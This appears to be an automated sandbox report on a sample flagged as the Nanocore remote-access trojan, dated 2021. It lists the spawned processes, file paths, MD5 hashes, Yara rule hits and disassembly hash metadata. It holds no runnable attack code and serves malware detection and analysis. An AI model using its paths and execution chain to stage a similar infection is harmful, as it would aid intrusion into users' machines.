                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\Windows\System32\notepad.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
                                Imagebase:0xff1d0000
                                File size:193536 bytes
                                MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 912 Parent PID: 2820

                                General

                                Start time:11:00:04
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\cmd.exe
                                Imagebase:0x4ab20000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: iBCrDCK.i.exe PID: 2340 Parent PID: 2820

                                General

                                Start time:11:00:16
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 20%, ReversingLabs

                                Chronological Activities

                                Analysis Process: drvinst.exe PID: 1464 Parent PID: 584

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drvinst.exe
                                Wow64 process (32bit):false
                                Commandline:DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
                                Imagebase:0xff860000
                                File size:102912 bytes
                                MD5 hash:2DBA1472BDF847EAE358A4B9FA9AB0C1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: rdpdr.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drivers\rdpdr.sys
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0xff380000
                                File size:165888 bytes
                                MD5 hash:1B6163C503398B23FF8B939C67747683
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: tdtcp.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:23
                                Start date:02/08/2021
                                Path:C:\Windows\system32\drivers\tdtcp.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:23552 bytes
                                MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: tssecsrv.sys PID: 4 Parent PID: -1

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\DRIVERS\tssecsrv.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:39936 bytes
                                MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: RDPWD.SYS PID: 4 Parent PID: -1

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\Drivers\RDPWD.SYS
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:212480 bytes
                                MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: iBCrDCK.i.exe PID: 2260 Parent PID: 2340

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: iBCrDCK.i.exe PID: 2428 Parent PID: 2340

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Joe Security

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: powershell.exe PID: 2396 Parent PID: 2604 powershell.exeCOMMON

                                  Executed Functions

                                  Function 000007FF002706E5, Relevance: .2, Instructions: 229COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2108539804.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8dafd40702bcbcfa6f5b44c463f1adf58869558403f9f094bbd41efb5b446ef
                                  • Instruction ID: bc9b8a651e376cc0771dd43052e4bd07343ee4bd24bac5815e57d65d8ca79de6
                                  • Opcode Fuzzy Hash: b8dafd40702bcbcfa6f5b44c463f1adf58869558403f9f094bbd41efb5b446ef
                                  • Instruction Fuzzy Hash: A1518B1190EBC24FE75357786C667A17FA09F17210F0A01E7D488CB0A3E9585E99C3A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000007FF002713E1, Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2108539804.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d02c3ab41870044e4216fe2c71aafc5dacae852357c1ac1c50f6fb8e0598cc48
                                  • Instruction ID: 85513f23e1e8d4934d6830386ade2547c3c7b6c115776f252e8187d5df895b82
                                  • Opcode Fuzzy Hash: d02c3ab41870044e4216fe2c71aafc5dacae852357c1ac1c50f6fb8e0598cc48
                                  • Instruction Fuzzy Hash: 0A11789684E7D44FD70353746DA52913FB0AF6B224B4E02DBE884CE0B3E1590A99C363
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Analysis Process: powershell.exe PID: 1068 Parent PID: 2604 powershell.exeCOMMON

                                  Executed Functions

                                  Function 000007FF002706E5, Relevance: .2, Instructions: 233COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2119274032.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cc858c49b3505dd0e02519f271b26a16f33040c05ef4b48095cb913cd2d347b
                                  • Instruction ID: 513a83a8cf792523e4f363f9f0e38ff33a5dc65a6d80c30fea00f3217429ac5c
                                  • Opcode Fuzzy Hash: 8cc858c49b3505dd0e02519f271b26a16f33040c05ef4b48095cb913cd2d347b
                                  • Instruction Fuzzy Hash: 4651CF1150E7C28FE34757786C666E17FB09F17210F1A01E7D488CB0A3D9596E99C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Analysis Process: putty.exe PID: 2952 Parent PID: 1068 putty.exeCOMMON

                                  Executed Functions

                                  Function 002A0A50, Relevance: 3.1, Strings: 1, Instructions: 1881COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4v
                                  • API String ID: 0-2653448934
                                  • Opcode ID: e5cddce35e014618426039f6f9246a2fa8e2a11751644e16769aae6242e82749
                                  • Instruction ID: 015a328f9228f5056dde7de2493fd534324902896baca5d65abc1b347501acd0
                                  • Opcode Fuzzy Hash: e5cddce35e014618426039f6f9246a2fa8e2a11751644e16769aae6242e82749
                                  • Instruction Fuzzy Hash: 2B13C574A11618CFC765DF34C894BA9B7B6FF8A304F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AF450, Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386
                                  • Opcode ID: f6a0bf6d3068174a2b88b01ff38e7690869309a85c4b884fc6ed8101c93cc75a
                                  • Instruction ID: fe090d7970e99943037eb8ef174f9712ff0511d38c6df8df5374d2d347aab94f
                                  • Opcode Fuzzy Hash: f6a0bf6d3068174a2b88b01ff38e7690869309a85c4b884fc6ed8101c93cc75a
                                  • Instruction Fuzzy Hash: 9F914770D24219DFCB44DFE5D6815AEFBB1FF8A300F20A52AD406BB214DB789A518F84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A31F8, Relevance: 1.3, Instructions: 1268COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a534cf111035108662c4dd39c6e00df2d5c9c1165c129d66f28bb801e5e4c9e
                                  • Instruction ID: 6ca2b9b21a77ff0313d949a0795e83ec7b58717a780e7eacb0a7de142a2f8d20
                                  • Opcode Fuzzy Hash: 6a534cf111035108662c4dd39c6e00df2d5c9c1165c129d66f28bb801e5e4c9e
                                  • Instruction Fuzzy Hash: D1D2A534A01658CFC765DB24C898BEDB7B1FF8A305F6052E9E4096B2A0DB716E84CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A8938, Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94c7d4194aa9fef630666412318123e004516af14740d41aa283991ac7a716ce
                                  • Instruction ID: 8fb92b04ec73dec9d4cd9462b2eb42b6459afa6871eaf4415d12b7099ee0729f
                                  • Opcode Fuzzy Hash: 94c7d4194aa9fef630666412318123e004516af14740d41aa283991ac7a716ce
                                  • Instruction Fuzzy Hash: C0C15A70D2520ADFCB04CFA4D5848AEFBB1FF4A310B209559C416BB325DB74AA91CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002ACD28, Relevance: .2, Instructions: 214COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57b15002eb9e469d5f6e79517b06ff0e1f1e616db6319bf0b4c36ceee3502086
                                  • Instruction ID: cf9512765f26ba273144e57645d2a048dee10e0f4d46621c969f6d3930301e03
                                  • Opcode Fuzzy Hash: 57b15002eb9e469d5f6e79517b06ff0e1f1e616db6319bf0b4c36ceee3502086
                                  • Instruction Fuzzy Hash: DA9133B0D15609DFCB04DFAAD5805AEFBF2BF8A310F24C12AD425AB254DB349A41CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5C98, Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 836904e9b11ff72dca3d7397335e54eb06b5af514a40b2349664bca54f585e8a
                                  • Instruction ID: f8555858d8cc361240ca85c59470909f0fae8617f4b4171331d0603eb395ab49
                                  • Opcode Fuzzy Hash: 836904e9b11ff72dca3d7397335e54eb06b5af514a40b2349664bca54f585e8a
                                  • Instruction Fuzzy Hash: 917159B0D019188FCB04DFEAD5845AEFBF2BF99320F28C165E464AB355DB349A11CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A6A38, Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7847effe9ef8391faea44d92e5c40571919768ee81cc49e5b444b6f969631a3
                                  • Instruction ID: a160be01be5763410cce14b0e8318dc65c7c9574f33f5405840568adb2a98d58
                                  • Opcode Fuzzy Hash: d7847effe9ef8391faea44d92e5c40571919768ee81cc49e5b444b6f969631a3
                                  • Instruction Fuzzy Hash: 9671DF74E11219DFCB08CFA5D984AAEFBB2FF89300F24952AD405BB254DB749A41CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AD150, Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 292d31fddc825dd47dae2f131b691671e99c4f16e7f7cce4c7744ab527f5760f
                                  • Instruction ID: de778d3a4777660a8d5f6ab4533dd9af42e0d1d336d857cc295bc87425455589
                                  • Opcode Fuzzy Hash: 292d31fddc825dd47dae2f131b691671e99c4f16e7f7cce4c7744ab527f5760f
                                  • Instruction Fuzzy Hash: 74515870D142199BDB00CFA5C980AAEFBB2BF8A310F24C56AD416B7654DB749A10CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A7178, Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39586ec789f2dae03c90a2f7c8b9d66be14d6a90d63be8805ee8f50895709903
                                  • Instruction ID: 62d91795d016b6ddb05711bb956ff0c952f2741fff611c5a08cca6c3ebf6cdbe
                                  • Opcode Fuzzy Hash: 39586ec789f2dae03c90a2f7c8b9d66be14d6a90d63be8805ee8f50895709903
                                  • Instruction Fuzzy Hash: 51516D71D192098FCB04CFE5D8806AEFBF2FF8A300F24906AD855B7255C7349A51CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5C89, Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0197c40463dbe55f772e822d29be1b68373ae36cd68113ded7d24236f004fe0
                                  • Instruction ID: 4f88e3cc2350c2aae33c6c4e8436ebf3870ed78af7ea9bafd1f091038d29e3fa
                                  • Opcode Fuzzy Hash: d0197c40463dbe55f772e822d29be1b68373ae36cd68113ded7d24236f004fe0
                                  • Instruction Fuzzy Hash: C6417DB0D019188FDB04DFEAD58069EFBF2BF99320F14C169E414AB355DB349A11CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A7A90, Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ee46e1a39865192e57942b26b4fc552f23a4c367748e6fae54f895e80a8afc9
                                  • Instruction ID: d265b743c746b8ab8fb5de7f8c35a7a7ca2f48c3ed74d8f8b2f9d3b8dc0cc86b
                                  • Opcode Fuzzy Hash: 5ee46e1a39865192e57942b26b4fc552f23a4c367748e6fae54f895e80a8afc9
                                  • Instruction Fuzzy Hash: 9721F9B0D046588BDB19CFA6C85478EFBF3AFC9300F14C06AD408AB265DB740A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A0280, Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: (b $(b $(b $(b
                                  • API String ID: 0-1323414954
                                  • Opcode ID: 369696caeae05bb082ff3741001f8abdd229a3c2159b8f95e2e500dd69193bb6
                                  • Instruction ID: ba86f378a7424b390c0421f45357ff66c2d771a88d0a10dfd8d3cbf1b677a4eb
                                  • Opcode Fuzzy Hash: 369696caeae05bb082ff3741001f8abdd229a3c2159b8f95e2e500dd69193bb6
                                  • Instruction Fuzzy Hash: 25419C78A10209DFDF04CFA8C984BADBBF1AF4E310F1054A5E902AB3A0D778A954DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A05A8, Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: :@lq$\, $he
                                  • API String ID: 0-487991920
                                  • Opcode ID: bb51c5971a051eb4bcd558ae59bf6fd19dc628fd699bcbb1e268f79ad5c7ae89
                                  • Instruction ID: fe85173b9a72bad290597e6ef8cbc69bb8f0e2ba205c1fe81f1b54f729027f55
                                  • Opcode Fuzzy Hash: bb51c5971a051eb4bcd558ae59bf6fd19dc628fd699bcbb1e268f79ad5c7ae89
                                  • Instruction Fuzzy Hash: F791F274E11219CFEB14DFA8C894BADBBF1BF8A314F204069D409AB391DB70A995CF11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A0400, Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: k(l$k(l
                                  • API String ID: 0-4029483140
                                  • Opcode ID: 147ab96e807c07b4110f7761d908461648895a4e45a6a82d7bac07c80f2c7270
                                  • Instruction ID: 2f42906df7baf46b38b37265e7365478894c3188245118a114886498cb624851
                                  • Opcode Fuzzy Hash: 147ab96e807c07b4110f7761d908461648895a4e45a6a82d7bac07c80f2c7270
                                  • Instruction Fuzzy Hash: AD01D97584122CCECB209F60C889BDDBBB1BB28304F2091D9D109A3250C3358B86CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FAB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001FABD5
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: ab263dc1ea80d4c61edf5820918e63d65bacb29af5c406a253ebd61a40efc7c1
                                  • Instruction ID: dc8874626ada4387577278b0631e4563bb5a1de632299275d8a7a6429e34a904
                                  • Opcode Fuzzy Hash: ab263dc1ea80d4c61edf5820918e63d65bacb29af5c406a253ebd61a40efc7c1
                                  • Instruction Fuzzy Hash: 7F31B4B2544384AFE722CF11CC45FA7BFACEF06350F0885ABF9858B152D265A909C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FAC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E33F803A,00000000,00000000,00000000,00000000), ref: 001FACD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: d6d07213c9439d15e21e1f2f609aa5dd6f5a22876abfe9d4f3ed24e1d309bbbb
                                  • Instruction ID: 05843b963d3186fcdd5081438db8e99df4ac09180b8255925c893cc055ebaffb
                                  • Opcode Fuzzy Hash: d6d07213c9439d15e21e1f2f609aa5dd6f5a22876abfe9d4f3ed24e1d309bbbb
                                  • Instruction Fuzzy Hash: CD319175105784AFE722CF21CC45FA2BFB8EF06350F08849AE989CB153D364E949CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB074, Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001FB10E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: 16bc25d8a05e8d205623405eadab8c821dd8cdebec06185d3c3cc466434b9b0e
                                  • Instruction ID: c602db145406791eb273c00b9618dd90823479cd91bc6caa4e508c41d4985d6b
                                  • Opcode Fuzzy Hash: 16bc25d8a05e8d205623405eadab8c821dd8cdebec06185d3c3cc466434b9b0e
                                  • Instruction Fuzzy Hash: 2E316F7140E7C06FD3138B259C61B62BFB4EF47650F0A41DBE884CB6A3D229A919C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FAB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001FABD5
                                  Memory Dump Source
